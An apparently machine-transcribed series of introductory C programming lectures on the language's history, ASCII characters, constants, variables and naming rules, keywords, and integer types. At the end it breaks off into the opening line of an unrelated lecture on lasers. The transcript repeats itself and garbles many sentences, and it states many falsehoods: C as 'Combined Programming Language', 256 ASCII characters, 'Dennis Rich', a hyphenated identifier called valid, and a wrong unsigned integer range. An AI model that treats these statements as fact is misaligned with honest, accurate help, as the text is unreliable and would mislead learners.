in the C language to be develop the programs. Now for the program consists with input instructions and output instructions. But listen, generally if you are learning the C programming language, whenever you write the C programming language, what type of softwares can be developed, which type of softwares can be developed, system software can be developed. What is the meaning of that? Which softwares are understandable by machine? That softwares are system softwares. That means using C language program, which type of softwares can be developed? System softwares can be developed. Which are the system softwares? Example, check it: DOS, Unix, Windows, Linux, Mac. Now in the market, Unix operating system originally developed based on the C language. Unix operating system actually developed C programming code. And now in the market, some applications also there, database applications like Oracle. Oracle also developed based on the C programming code. And one more is driver programs also developed based on the C programming code. Finally, what is my conclusion now? Using C language, what type of software can be developed? System software. What are the example of that? Operating systems can be developed. Now you see, using C language, which operating system is developed? Unix operating system is developed. Unix software developed based on the C language. Using C language code only Unix software developed. Now see, before going to start for the C language, what is the history about the C language? History about C programming language. Actually C is a programming. Before C programming, what are the programming languages available? Before C, history of programming languages. Now in the 1960s, one program is introduced. In 1960s, one programming is introduced. Which programming is introduced? BCPL. BCPL programming is introduced. What is meant by BCPL? Basic Combined Programming Language. In 1960s, BCPL programming language is introduced. Who is the author of BCPL program? Martin Richards. Martin Richards, he is one of the American. Martin Richards started the BCPL programming language. It is also high level. Martin Richards started the basic combined programming language, where it is developed in at AT&T company will be there. AT&T company, that is nothing but American Telegraph and Telecommunications, AT&T company. Then you see AT&T company, you have AT&T company, American Telegraph Telecommunications. At that AT&T company, Bell Laboratory is there in US. In US, Bell Laboratory, AT&T company, which is developed BCPL programming language developed. This programming developed by Martin Richards. He is the author of the BCPL language. And see that after 1960, one more language is also came in the market. One more language is also came in the market. That is on 1966. 1966, one more programming language is started. That programming is called as 1966 B programming. B language programming started. B language. Before that B language, which language is very famous language? BCPL, Basic Combined Programming Language. But that name is changed by B language. Some features are added. Some features are added to the BCPL, to the B language. Who is the author of that B language? Ken Thompson. Ken Thompson started the B programming language. Where it is started, again same, AT&T company, American Telegraph Telecommunications, AT&T company, and Bell Laboratory, AT&T company, Bell Laboratory. In US only started the
B programming language. Now coming to the C language history, actually C language started in 1972, which is the year of C programming language introduced here. What is the name? 1972 started the C programming language. 1972, who is the author of C programming language? Dennis Rich. He is one of the American. Dennis Rich started the C programming language in 1972. Where it is started? Again same, AT&T company, Bell Laboratories, C programming language is introduced. 1972, Dennis Rich, AT&T company, Bell Laboratory, C language program is introduced. C language program. Finally, what is my conclusion? C language before, which is the very famous language? BCPL language. C language before BCPL language is very famous. After BCPL, which languages came in the market now? B languages came in the market. After that B language, which languages came in the market? C language. Advanced of C, one more language is coming in the market after C. C++ programming language. After C, C++. After C++, which is the advanced programming of nowadays? Java programming language. Now these are the various different type of programming languages now in the market. The first, it is used BCPL programming languages used. After that B language programs are used. After that C language programs are used. C language advanced is C++ programming. C++ advanced is Java program. Now see, what is the abbreviation of C? Actually C language, C programming language. How to abbreviate the C? C called as what? Combined programming language. C is nothing but combined programming language. Under C programming, which programming features are combined? A language, before B A language also there, before B A language. What is meant by A language? Assembly language programming, plus B language. What is meant by B language? It's a basic programming language, basic combined programming language. Finally, what is my conclusion? C abbreviation called as combined programming language. Before C, which languages are there? A language and B language. Both programming features added into the C language. That is for C language. And one more is, you can abbreviate like C. C is compiler based language. C is a compiler based. It's a compiler based. What is meant by compiler? Compiler called as, it's one type of translator, what I discussed. All programming lines convert to the machine language. Again, that is converted to the our understandable language. This work is done by which processor? Compiler. Compiler will be done. And you see that in the market, which are the famous compilers are there? Compiler examples are there. You see some compilers. Turbo C, TC compiler. TC called as Turbo C compiler, and TC++, Turbo C++, Turbo C++, it's also one compiler. ANSI C, it is also compiler. Div C, it is also compiler. Bornold C, it is also compiler. Different type of compilers introduced to different companies. These all are many compilers. Now these all compilers you can run with the C language programs. Suppose in your machine you want to work the C language program, which is the software to be installed? Compiler to be installed. All these compiler, any one to be installed, then only you can run the programs. Now see, while working of C programming language, you see that C programming language you have. Generally, if I want to understand English programming language, English is nothing but it's a communication between user and user. Suppose if I want to communicate machine with the help of C programming language,
If any language you don't know that, how to learn for the languages? Suppose you don't know the English, or if you don't know the Hindi, or if you don't know that other languages, how to learn for that languages? First you have to start with the alphabets. First you have to start for learning alphabets. Suppose if you want to learn the English, suppose English language, how to start for learning? You have to start with which is the English language character set. Which is the English language character set? A to Z. A to Z to be understand alphabets. After learning of that, what to be understand? Once you are learning the English language basic character set, what is the next step to be follow? What to be understand? Making of words. Making of words. Whenever you learn the A to Z alphabets, then what is the next step to be move on? Words learning. What is meant by word? Word is nothing but a set of characters, a group of characters. It's called as words. Once you are learn the words, after learning of words, what is the next step to be move on? Sentence creations. Sentence creations. Whenever you perfect of words making, then you move on to the sentence learning. What is meant by sentence? A group of words is called as sentence. Every sentence terminated by dot. Every sentence terminated by dot. Whenever you are learn the sentences, what is the next to be move on? Whenever you learn the sentences creations, what is the finally to learn? Paragraph creations. Finally to learn paragraph. What is meant by paragraph? Paragraph called as what? A collection of sentences. What is meant by sentence? A collection of words. What is meant by word? A collection of characters. That means what? If you want to understand any language, first you have to know about some basic characters. If you want to understand for the English, this is called as character set. Once you are learn the characters set perfectly, you have to go for words creation. What is meant by word? A set of characters. It's called as word. Whenever you perfect the words, then what to be learn? Sentence. What is meant by sentence? A set of words or a group of words. But every sentence terminated by full stop. Whenever you perfect in the sentences creation also, you can write the paragraphs. Your own, you can write the paragraph. You can make a story also. A set of sentences called as paragraph. Similar way, coming to the C programming language, C also you can learn different steps are there. Whenever you want to learn for English, these are the steps to be follow. Similarly, if you want to understand C programming language, you have to go for some steps. But what is the difference of C language and English language? C is also language, English also language. But what is the difference of C and English? English is nothing but user to user communication, people to people communication. But C language is communication between the user and the machine. Machine understand. Not only C language, C++, Java, .NET, you want to communicate the machine. Because machine does not understand your language, to communicate that with the help of programming languages. English is language to communicate the people, C is the language to communicate the machine, programming language. If you want to understand the C language program, you have the steps. You have the steps. What is the step number 1? When you go for English language, what to be understand? Just alphabets, A to Z. In English language, how many alphabets? 26, A to Z to be understand. But when you go for C programming language, A to Z, after that capital A to Z, you want to work with the capital letters also here. Capital letter to be start,
capital letters, and small a to z, after that a capital A to z, and one more is 0 to 9 digits, and one more is symbols, some symbols like special symbols you have. In the keyboard you have some different type of symbols, special symbols. That means what? If you want to understand the C programming language, these are the characters to be followed for the C programming language. Lowercase letters A to Z, uppercase letters capital A to Z, 0 to 9 digits, and symbols. This is completely called as what? C language ASCII characters. It's called as, the name is ASCII characters name. What is meant by ASCII? American Standard Code Information Interchange. American Standard Code Information Interchange. It's completely ASCII values. In English language only for alphabets, but for the C language totally small letters, capital letters, digits and symbols. How many ASCII values in the C language? 256 characters. 256 characters. I mean small a to z 30, small a to z and capital A to Z and 0 to 9 and remaining symbol, all are. This is completely 256 characters. This character set called as ASCII character set. That should be understood. What is meant by ASCII characters here actually? If you are entering with small letters, American character, some code will be there. Code. What is the code of that small letters? 97 to 122. It's a coding of small letters. 97 to 122. If I enter the small a, 97. If I enter the small z, 122. Whenever you are enter the capital letters, which is the code 65 to 90. That means uppercase ASCII values are 65 to 90. Lowercase ASCII values are 97 to 122. 0 to 9 also ASCII values 48 to 57. Remaining all are the symbols, totally 256. This is the basic character set of C language. Now this character set not only for C language, if you learn for the Java, C++, .NET, COBOL, every programming this character set to be followed. 256 characters, this is compulsory to follow American Standard Code Information Interchange. Once you are learning of this ASCII characters, what is the next step to be move on? Keywords learning. What is mean by keywords? Which words are already defined by C language author? C language author defined some meanings. Those meanings are called as keywords. How many keywords defined by C language author? 32 words. It's a predefined. Like int, integer, char, character. Some meanings already defined. Done is which already defined. Some meanings. Those words are called as keywords or reserved words. Once you have learned the keywords or reserved words, what to be next to be move on? Variables. Keywords are nothing but author defined, variables are nothing but user defined. These are the user defined words. Keywords are author defined words, but variables are user defined words. If I want to store any value, if I want to manipulate any value, variables to be used, our own defined. What is one more to be understand? Constants. I mean which value you want to fix the value, you don't want to change. It's a constants. Suppose if I want to calculate the pi area of the circle, pi r square. What is the pi value? 3.14. It's fixed value. I don't want to change of that value. That type of values can be enter constants. That is called as constants. Whenever you understand this keywords making, variables making, constants making, what is the next step to be follow? Statements to be follow. Statements creation. What is meant by statements? A set of keywords, a set of variables, or a set of constants. You want to define as one line. The line is called as statement.
a set of words or a set of variables or a set of constants, you make a line, the line called as statement. Every C language statement terminate with a semicolon symbol. Every C language statement, every line ends with semicolon. In English language means every sentence ended by full stop, but C language means every statement ended with a semicolon to be used. Finally, what to be developed once you learn of these? Programs to be developed. Finally, to develop the programs. What is meant by program? A set of statements. A set of statements is called as program. A set of statements is called as program. Now you see, this is the way of learning. Whenever you want to learn the C programming language, these are the steps are involved. First you have to start for learning ASCII characters, which are the characters used in C language. After that, to learn the keywords, which words are already defined, other defined, which are the variables, our defined words which can store the values. Constants means which are the fixed values, you don't want to change of that values. Once you are learning of these all things, then go for moving on statements. How to make a statement, a set of keywords, variables, constants, you make a line, the line called as statement. Every statement ended by semicolon. What is meant by program? A set of statements. Finally, that is for a way of learning C programming language. Finally, what is my discussion about that this C programming language? Whenever you learn the C programming language, what type of softwares can be developed? System softwares can be developed. Now in the market, which are the system softwares are there? Unix operating system, Linux, DOS, Windows. Unix operating system basically developed from C programming language. Application software means our understandable softwares. Those are developed based on the Java, .NET and advanced programming languages. But C is used only to develop the system applications, console applications. Get it or not? That is for system application software to be developed. Okay. Then tomorrow class I can continue the basics of C language structure I continue. The tomorrow session I will continue. Hi viewers, this is C language program. The last class I discussed what is the need of C programming language, why you have to use the C programming language, what is the history about the C programming language, which kind of softwares can be developed based on the programming languages. Actually C is a high level programming language and C is a advanced programming language. Using C language, which type of softwares can be developed? System softwares can be developed. Now in the market, which are the system softwares are there? DOS, Windows, Unix, Linux. Using C language, Unix software already developed based on the C language. Now for the what is the history about the C language? In 1972, AT&T company, American Telegraph Telecommunications, Bell Laboratories, C language developed by Dennis Rich. Before C language, which are the famous programming languages? First programming language is BCPL, Basic Combined Programming Language. That language developed by Martin Richards. That language changed to the another language program name, that is called as B language, developed by Ken Thompson. Later B language changed to the C programming language, developed by Dennis Rich, AT&T company, Bell Laboratories in the year of 1972.
Now in the market, all programming languages, which is the basic programming language to be followed? C programming language. Now which are the advanced programming nowadays? Java, .NET, PHP, these all programming languages. Basic language is C language is required. Without C language you can't understand Java, .NET or PHP, all other programming languages. Now see, the last session I discussed the basics about C language. That means how to learn the C programming language. How to learn the C programming language? Suppose if we want to learn the English language, which are the basics are there. First we start with alphabets. If you want to understand the English language, first we start with alphabets learning. After learning of alphabets, words creation. After learning of words, sentences creation. After making of sentences, paragraph creations. This is the same way you can work with C programming language also. Steps will be there. How to develop the C programming language, you have some steps. Generally English language, which is the basic character set A to Z, 26 alphabets. If you want to work with the C programming language, which is the basic character set of C programming language, ASCII characters are there. That is called as American Standard Code Information Interchange. In English language A to Z, 26 alphabets. If you want to understand the C programming language, 256 characters to be learned. Those characters are called as American Standard characters. Under American Standard characters, which are the characters used? Uppercase letters, lowercase letters, symbols and digits. Finally, what is my conclusion? C programming language, which is the basic character set to be follow? Alphabets, numbers and symbols. This is called as ASCII character set. Whenever you learn the ASCII character set, what is the next step to be move on? How to work with keywords. What is meant by keywords? Which words are already developed by C language or there? Those words are called as keywords. Suppose when you go for C programming, int means integer, it's already developed by other. Char means character, float means decimal, double means long float. Like that you have many keywords are there in C programming language. How to define the keywords? Which words are already defined by C author? Those words are called as keywords. Now in the C programming dictionary, how many keywords are there? 32 keywords. 3 to 32 keywords. Once you learn the keywords, what is the next step to be move on? Variable creations. Keywords are author defined. What is meant by variable? Which words are already defined by other keywords? Which words are defined by user? That are called as variables. Variables are nothing but which user define, which can store the value, which can manipulate the value. That is called as variables. Whenever you learn the variables, what is the next step to be move on? Constants. How to define the constants? What is meant by constant? Which value cannot changeable, that values are called as constants. Which value can changeable, that are called as variables. Variable value can changes, but the constant value cannot be changes. Suppose in your program you want to change the values, variable can be used. In your program you don't want to change the values, constants, fixed values. Suppose I want to calculate the area of circle. What is the formula for area of circle? Pi r square. What is the pi value? 3.14. That is fixed value. You can't change of that pi value. Radius value can be changed. Pi value cannot be changed. Those values are called as constants.
which value cannot changeable, that is called as constants. Once you learn the keywords, variables and constants, what is the next step to be move on? Statement creations. What is mean by statement? A set of keywords, a set of variables, a set of constants, you make a line, the line called as statement. Every C programming statement ended by semicolon, it is terminated by semicolon. In English language, every sentence terminated by full stop, but C language, every statement ends with a semicolon. Different type of statements, maybe variable declarations, or maybe expressions, or maybe initializations, or maybe input statements or output statements. A statement is consists of variables, keywords, constants or expressions. Every statement ended by semicolon. Whenever you learn the statements, what is the next step to be move on? It's a final step, program creations. What is mean by program? A set of statements or a set of instructions is called as program. Every C language what to be developed? Programs to be developed. The programs are defined based on the statements. The statements are defined based on the keywords, variables and constants. Now the keywords, variables, constants, which is the basic character set, ASCII character set, American Standard Code Information Interchange, totally 256 characters. Now these are the basics. You can work under C++ also, you can work under Java, you can work under .NET also. The same character set you can work under Java also, .NET also, PHP also, other programming also. It's a basic character set. Now you see that when you see the what are the steps to be move on for the C language, you see that steps alphabets, digits, special characters. Whenever you create that alphabets, digits and special characters, you learn keywords, variables and constants. Then after that you have to make a instruction or statements, finally to develop the programs. Now you see which is the C language character set. Which is the C language character set you have? C is a case sensitive programming. What is mean by case sensitive programming? Case sensitive called as, if you are use the small letters, that you have to use only the small case letters. If you are use the capital letters, everywhere the capital letters only use. You can't convert upper to lower and lower to upper. What is the mean that? Suppose your variable is small letter, that variable everywhere to use the small letters. If you are using the capital letters, that variable can be used everywhere capital letters. You can't convert upper to lower, lower to upper. C language is a case sensitive programming. Nowadays all professional programming languages are case sensitive. Java also case sensitive, C++ also case sensitive, .NET also case sensitive. But when you go for HTML, it's not a case sensitive language. Any case can be learned, either lower case or upper case. But the professional languages are followed by case sensitive. Because of security reason you have to use. Now you see C is a case sensitive programming language. That means there is a difference between the small and capital letters. You see that when you go for ASCII values, uppercase A 65 is the starting of ASCII value. Small a, which is the ASCII value, 97. But these are not our defined, it's already predefined. Actually you are enter with a, it is understand the 65, but internally machine convert to the binary number. 65 converted to the binary internally. If I enter the small a, 97, 97 also internally convert to the binary number, ones and zeros. You see that what are the uppercase letter ASCII values? Capital A to capital Z, 65 to 90. And what to be remember?
every C programming compulsory this 65 to 90 to be understand. Uppercase letter ASCII value should be remember. In the future programming also compulsory capital A for 65, capital Z for 90 to be follow, compulsory to remember this. Not only C language, C++, Java, .NET also, because it's a ASCII values. Like when you go for small letters, small a to small z, 97 to 122. Small a ASCII value 97. If I enter the 97, it is converted to the zeros and ones, binary numbers. 97 to 122, 26. 65 to 90, 26. Digits also ASCII values. Suppose if I enter the 0, our entered the 0, but it is internally convert to the ASCII 48. The 48 convert to the binary. If I enter the 9, our entering number 9, but the digit convert to the 57, that is convert to the ASCII binary numbers. That is called as fixed ASCII values. Finally, what is my conclusion? Uppercase letter ASCII value 65 to 90, that should be remember. Lowercase ASCII value 97 to 122, that should be remember. And 48 to 57, that is called as 0 to 9, digits ASCII value. The remaining all are special symbols like hash, dollar, @ cap, star, but these symbols no need to remember, that is also available. Finally, total ASCII values 256 ASCII values, 256 characters. That is called as C language character set to be understand. Now you see, once you learn of the C language character set, what is the next step to be move on? You see that constants. Constants to be developed. What is mean by constant? Constant called as what? Which value cannot changeable. Suppose I am defining pi. Pi is a variable I define. Inside of the pi, I enter the 3.14. It's a fixed value. Suppose if I want to enter the integer means you can enter only for plain numbers. That is also you want to fix that. Which values cannot changeable while designing of the time, that is called as constants. Which value can changeable, that are called as variables. That is our requirement based on the program requirement to use. If I want to calculate the area of circle, pi value should make it as constants. Radius value should make it as variables. You can enter the any radius. Now you see the constants are generally two types of constants you have. Character constants are there. What is mean by character constants? Whenever you are entering with the single letters within the quotation, that is called as characters. What is mean by character constants? Which value enter within the single quotation, it treated as characters. Maybe alphabets you can enter, maybe digit also you can enter, maybe symbol also you can enter, or maybe special symbol also enter. What does it mean? That character means any letter, only the single quotes, single letter only allowed, not for multiple letters. When you move on the strings, what is meant by string? Multiple characters. You can store multiple characters. Character is nothing but single character, string is nothing but group of characters. It's called as string. Like you see double quotes, every string value should be double quotes, A, B, C. It's a string. 435. Actually 435 as a number, but if I put in the quotation, it treated as string. Without quotation, it treated as number. Within the quotation, it treated as string. If I enter the RAMA, Rama, it's a name, it's a string, group of characters. String consists with the alphabets also, string consists with the digits also, string consists with symbols also. Like email ID consists with @ symbol, that is also you can treat it as strings. These two categories are character constant categories. Character constant category means character means single letter, string means group of letters. Anything can be entered which is fixed values. The next category, numeric constants you have. What is meant by numeric constants?
Whenever you want to enter the numbers, then go for numeric constants. If I want to enter the numbers, numeric constants. Under C language, which are the numeric constants? Integers. What is meant by integers? You can enter only for plain numbers. Integer value, don't put the quotations. Direct number, no quotation, no double quotes. Direct number, plain number, there is no decimals. The integer allowed negative value also, integer allowed positive value also. Signed integer, what is meant by signed integer? Negative value can enter. Unsigned integer means only positive value can enter. Now this is number, something, any number, this is negative, it is a signed, negative sign indicates signed. If there is no sign, it is called as unsigned. Real number constants you have. What is meant by real number constants? If I want to go for decimal points, number with decimals. Number with decimal points. You see that fraction forms, fractions, 435.67, 2 decimals you have. 345.3054, you have the 5 decimals. Decimal points, maybe 2 points, maybe 6 points based on our type. Exponential forms. What is meant by exponential forms? E power values. 0.02, expansion of 3, 1.17, expansion of minus 38. E means exponent value. It is called as a fraction. Exponent value will be there. E for exponent, 10 to the power of value, 10 to the power of values in mathematics. Now these all are called as constants. Finally, what is my conclusion? Constants can be make it as numbers also. Constants can be make it as characters also. Under character constants, 2 types. Single character constants, multiple character constants. Multiple character constants called as strings. Under number constants, 2 types are there. Integer constants and fractional forms, I mean decimal constants. Exponential forms also allowed. These are called as constants to be understand, how to work off that constants. Now when you go for what is the next step to be move on? You see that what is the next step to be move on? Variable creations. Next step variables. You see that what is meant by variable? Variable called as which is user defined word, which can store the value and which can variate the value, which can change the value, that is called as variable. What is the mean that? Variable is nothing but our defined word. Keywords are nothing but other defined. Suppose if I use int is a keyword, you can't define. Char is a keyword, you can't define. Float is a keyword. Variable means our defined any word. Maybe your name, or maybe your marks, or maybe your phone number, that is called as variables. Variable value can changes. Now see, what is the definition of variable? Actually you can take the quantities which can be changed, which value can be changed during the execution of program called as variables. Which value cannot change, that is defined as constants. Which value can be changed, execution of program called as variables. A variable can be considered as name of the cell. Name of the cell, I mean memory, where you store in the memory, that cell called as variable. In that memory you can hold the value. You can hold the value, any value can be held. To use any variable, it must be declared. If I want to use any variable, it must be declared with its data type. What is the meaning of that? Suppose if I want to use with marks, if I want to use a marks, suppose marks is a variable. I want to enter the student's marks. Actually, student marks are which type of data? Student marks are numbers. Numbers means C language, which is the data type to define int. Int means you can enter the numbers. Suppose I want to define
grade of the students, A grade, B grade, C grade. At that time, which type of variable can be created? Character variable. Character variable means you can store the characters. Suppose if I want to store the attendance, student attendance, 45.6 attendance or 79.6 attendance, which is the data type to be defined? Float data type. That means what? Every variable proceeded with the data type. If I want to define the variable, before use of that variable, must and should defined as data type to be defined. You see that whenever you are declaring any variable, first it's followed by data type before first executable statement and then can be initialized. What is meant by initialized? If I want to assign any value, that is called as initialization. Once the variable you are enter any value, that is called as initialization. Before initialization, compulsory the variable to be declared. The variable should be data type to be proceed. That is called as variable to be discussed now. Finally, what is my conclusion of variables? It's called as user defined words. You can store the value based on the data types. If it is integer variable, you can store integers. If it is character variable, you can store characters. If it is string variable, you can store the strings. If it is float variable, you can store the decimals. Based on your type only, you can store the values. Variable is also called as memory container. If I want to store the value, compulsory memory container is there. That means what? If I used the integer, I want to store an integer value, memory should be created. Compiler allocated some memory, that memory cell name called as variable. Wherever holding the value, that memory cell called as variable. Now see what is the next step of the C language program. If I want to move that next step, if I want to define the variable, you want to follow some rules for variables. If I want to create the variable, some rules are there, rules for the variables. You see the rule number 1, the variable name must starts with either alphabets or underscore or may contain alphabets, digits. What is the meaning of this rule? Every variable must started with alphabet or underscore or may contain the alphabets and digits. What is the mean that? Suppose if I defined any variable, the variable first letter should be starts with the alphabet. What is the rule number 1? Every variable first letter starts with alphabet or underscore. Remaining letters may be alphabets or digits, but the first letter should be alphabet or underscore. Remaining letters anything. That is a rule of the variable rule. See that what is one more rule you have? The minimum length of variable is 1 character. Maximum there is no limit of this actually. There is no limit. But recommended length is up to how many characters? 31 characters. 31 characters. What is the mean that? Actually variable name minimum 1 character should be there. Maximum there is no limit actually. But mostly compilers recommended 31 characters. Mostly all compilers, C language all compilers recommended 31 characters. More than 31 also you can enter. It's not shown any error. What is one more rule you have? Whenever you create the variable, that must not be any blank space or special symbols in the variable name. Every variable name between there is no blank spaces, there is no special symbols in the variable name. What is the meaning of that? If you are defining a variable, in between you don't use for any spaces and there is no special symbols, but underscore is allowed. Except of underscore, remaining symbols not allowed in between the variables. Which are the special symbols like space, dot, hash, but which is allowed? Underscore is allowed. Now see, every variable name must not be a keywords. The variable should not be taken as keywords.
the variable names should be our defined, user defined, any word, but don't take it as keywords. What is meant by keywords? Author defined words are called as keywords. Keywords as a variables you can't define because it's already predefined. What is one more rule? Every variable name must be unique name. What is meant by unique name? There is no duplicate variable names in the single declaration. That means what? If I declare int x, x is a variable, int is a data type, just once you declare. Again same statement, you can't declare the same variable. In another declaration you can allow. In the same declaration the variable name should be unique, no duplicates. What is one more rule? Every variable names are case sensitive. What is the meaning of variable names are case sensitive? Suppose my variable is small x I created, entire program the small x only to use. Suppose if I create the variable uppercase x, entire program you can use uppercase x only. You can't change small to capital, capital to small. The variables are case sensitive. Finally, C program everywhere case sensitive. Function also case sensitive, keyword also case sensitive, variable also case sensitive. You have to follow that rules only to follow to make a program. Now see, these are the majorly 6 rules you have. What is the rule number 1? Once I repeat that, every variable name start with either alphabet or underscore. Remaining maybe contain alphabets or digits. Every variable name minimum length 1 character should be there, but maximum there is no limit. It recommended up to 31 characters. It is recommended, but it is not compulsory. More than 31 also you can exceed. Every variable name in between, don't take the blank spaces or special symbols. You can't use the space, you can't use the special symbol like dot, hash, but you can define the underscore. Underscore is allowed. Every variable name must not be a keywords. Actually keywords are author defined. Author defines, you can't change as a variables. Every variable name must be unique name. What is meant by unique name? There is no duplicate variables. Same variable 2 times cannot be declared. Single declaration it is not allowed. Variable names, the last one, variable names are case sensitive. If I defined as lowercase, lower only to follow. If I defined as uppercase, uppercase only follow. These are the rules to be follow to making of variables. See that what are the rules? Rule number 1, every variable starts with alphabet or underscore. Rule number 2, minimum 1 character, maximum there is no limiter, but recommended C compiler 31 characters. Rule number 3, in between special symbols not allowed, like space, hash, dot, underscore is allowed. And every variable name must be unique name. What is meant by unique name? There is no duplicate variables. Once I define the variable, same variable I can't declare in the same line. Maybe in another declaration area you can use. Every variable name must be not a keyword. It is not a keyword. Variable names are our defined. Any word can be used, like Ravi, Raju, serial number, marks, X, Y, I, J, any names. But don't take it as keyword as a variables. Every variable names are case sensitive. What is meant by case sensitive? Like if I use the variable name as a small letter, small only to use. Capital means capital only use. These are the rules to be followed to making of variables. You see which are the valid variables and which are the invalid variables. Here example observe. Which are the valid and invalid you observe. Employee number ENO. I defined as variable ENO. Yes, it is okay because this variable started with alphabet and this is no problem. You see that invalid variable EMP space name space I giving. Spaces are not allowed. In between variable no space. EMP name, here it is valid without space. EMP bracket, it is invalid because of special symbol.
EMP hyphen also valid, and here 45, I started the digit 45, it is invalid. Digit cannot start variables. Suppose if I used EMP underscore name, underscore is valid. Int, it's a keyword, you can't define as variables, it's a keyword. Underscore ABC, yes, underscore is allowed, first letter underscore is allowed. Char, it is a keyword, not allowed this. AB45, it's also valid, because as a first letter alphabet, remaining letter may be alphabets, may be digits, no problem. But here 45, it's a digits, here digits it will be started. Now these are the invalid variables, these are the valid variables. Every C programming variables, these are the rules to be followed, based on that rules only to define. That is the discussion about variables. Now I want to discuss keywords, like already I discussed the keywords. What is the definition of keyword? Keyword called as what? Which words are already defined by C language author? I mean done is rich already defined. 32 keywords. All C language compiler followed the 32 keywords. These are fixed, you can't change of the keywords. These are also called as reserved words or keywords or built-in words. Built-in words. These are built-in words. Now all C compiler supported these 32 keywords, totally 32 keywords. Every keyword some meaning is there, the meaning already defined. You can't change of the meaning, already defined. But every keyword followed as a case also. Is it keyword is small letter or keyword is capital letter? That should be remember. Mostly C language all keywords are followed by small letters, mostly small letters. Very few keywords are capital letters, mostly all keywords are upper lower case letters, not a uppercase. You see that what are the keywords we have? Keywords are also called as preserved words, which are already declared to the C compiler, already C compiler defined. C has 32 keywords. You have some list of the keywords. Actually these are not only keywords, some more also there. Here I defined only few keywords, many keywords are there. Auto, double, int, struct, break, else, these all are the keyword. These are only few keywords. Totally how many keywords you have? 32 keywords will be there. Mostly used that all keywords every program may be used, may not be used. And see that whenever you learn the keywords, what is the next you want to move off that? Data types. Whenever you learn the keywords, then data types. Now listen, till whatever I discussed, if whenever you start for learning of C language program, what is my first point? ASCII characters to be understand, American characters, that is called as C language character set. After learning of that, what I discussed keywords, just now I completed, which words are already defined by author, those are keywords. 32 keywords are there. And what is one more I discussed, constants. What is meant by constants? Which value cannot changeable, those values are called as constants. Which value can changeable, those are called as variables. And one more also I discussed, one more also to use, variable naming rules also I discussed. How many rules are there? 6 rules. Every C programming variable making, those rules to be followed, then only you can develop the C programs. What is one more discussion? Data types. In C language, one more important concept, data types. Data types are there. Actually, what is mean by data? Data called as information. What is mean by data type? Which type of information stored in the variable? I mean which type of value stored in the variable, that is decided by data type. Suppose if I want to store the numbers, integer can be used. If I want to store the characters, character to be used. If I want to store the decimal, float to be used. What is the definition of data type? Which type of information stored in the variables, that is decided by data types.
C language data types are basically two types are there, basic data types, derived data types. C language data types are two types, you have basic data types, derived. Basic data types also called as built-in data types, predefined. Derived data types also called as user defined data types, it is a user defined. Basic is built-in, derived types are called as user defined. You see the basic data types int, float, char, long, double. These are basically predefined or built-in. These are basically, under the some more subtypes also there. Actually these are the major types, but under that subdata types also there, subdata types. Which are the derived types? User defined. I mean programmer should be create this, programmer. Like array can be defined, array can be create. Structures, it is a user defined. Union, it is also user can be defined or derived. Type def, it is also user can be defined. Finally, what is my conclusion? Data types are two types of data types. C programming language, data types are two categories. First one called as basic types, second one called as derived types. What is meant by basic types? Which data types are already defined by C author defined. What is meant by derived data types? Which types you have to create, user to create or programmer to create, based on the requirement to create the types. Now see, under basic data types, you have some categories. Under basic data types, which are the types are there? Integer, main one is integer data type, character data type, and one more is float data type. These are major. And for the user defined, which are the types are there? Arrays, structures, unions, type def. Those are the user defined data types. Now see, under this basic data types only, subdata types also there. You see that how to work off these data types, it is very important. If you want to work with C language program, data types are most important, how to use of the data types. You see the data types. Suppose if I go for integer type, in C programming language, how to use the integer type? Int. What is the syntax of that? Int. What is meant by int? Int called as integer, it is a keyword, author defined. Variable means our defined, user defined. It is called as statement. Int is a data type, variable it is a statement. The statement ended with semicolon. Now you see some example. When I mentioned int serial number is a variable, int is a data type. Serial number is a variable name, our defined. Whenever this variable is integer, I can enter the number 10, it is valid, 10 is valid. If I enter the serial number equal to C, it is a character, don't allow this, it is invalid. If I enter the serial number 10.45, it is also invalid because decimal also invalid. If I enter the minus 10, it is a valid. That means negative value also allowed. Signed, minus indicates signed integer, signed also allowed. When I mention the integer data type, what is the memory occupation of integer? 2 bytes or 4 bytes. Why? Because some operating system like Windows, DOS, you have to use based on the 32-bit or 64-bit 2 bytes. And some some operating systems like Unix, Linux, you can take it as 4 bytes. Now you see, if I use the 2 bytes of integer, what is the maximum number can be defined? 2 bytes. 2 bytes means how many bits? 1 byte equal to 8 bits. 1 byte equal to 8 bits. 2 bytes means 32 bits. Sorry, 16 bits. 2 bytes means 16 bits. What is the range of that? Minus 2 power 15, I mean 16 minus 1 plus 2 power 15 minus 1.
This is the range, minus 2 power 15 to plus 2 power 15 minus 1. And if I use the 4 bytes, 4 bytes means 32 bits, minus 2 power 31, it is a fixed, 2 plus 2 power 31 minus 1. Finally, integer type means which only can store, numbers only store, digits only store, cannot store the characters and cannot store the symbols. You can't store the characters, you can't store the symbols. Every integer user can allow sign also allow. Now see, what is meant by integer data type? Under basic data types, integer is the first data type. What is meant by integer data type? It is allowed only numbers or digits. It is not allowed the characters not allowed. It is not allowed the special symbols, only plain numbers allowed. Integer means how much memory occupied, 2 bytes or 4 bytes. Why? Because if you are using with the Windows operating system, 2 bytes. If you are using with the 32-bit or 64-bit, if you are using Unix or Linux, maybe changes of your integer data type memory 4 bytes. If it is 2 bytes, what is the range? 2 bytes means how many bits? 16 bits. 1 byte equal to 8 bits. 2 bytes means 16 bits. What is the range? Minus 2 power 31 to plus 2 power 31 minus 1, that is 4 bytes. If it is 2 bytes means minus 2 power 15 to plus 2 power 15 minus 1. Now this range is a fixed range. In that range only you can enter the numbers. That range is predefined range based on the memory. Now for the integers, allowed only numbers. 2 bytes means minus 2 power 15 to plus 2 power 15 minus 1. 4 bytes means minus 2 power 31 to plus 2 power 31 minus 31 minus 1. Up to that numbers only allowed, more than that not allowed. Is it integer allowed the signed values? Yes, integer allowed the signed values. Negative integer also allowed, positive integer also allowed. Negative sign also allowed, positive sign also allowed. One more type of integer also there, the type of integer called as unsigned integer. Here I am discussing integer, mostly used integer. One more type also there under integer, unsigned integer. What is meant by unsigned integer? Unsigned indicates only for positive values. Whenever you define unsigned keyword, before int unsigned keyword, it is allowed only positive values. There is no negative values. Unsigned integer also how much memory? 2 bytes. What is the range can be defined? Every unsigned range 0 to be start, 0 number, there is no negative, 0 only to start, 0 to 2 to the power of 15 minus 1. If it is 4 bytes means 0 to 2 to the power of 32 minus 1. Finally, what is the difference of int and unsigned int? Int means only, int means positive and negative values. Unsigned means only positive values. Now these are the integer data type I discussed under C language data types. Some more data types in the next session I will continue. In the next session some more data types will be discussed. Thank you for Good afternoon. Today I am going to discuss about lasers. So in this lasers we will be having 3 subtopics. One is laser fundamentals,
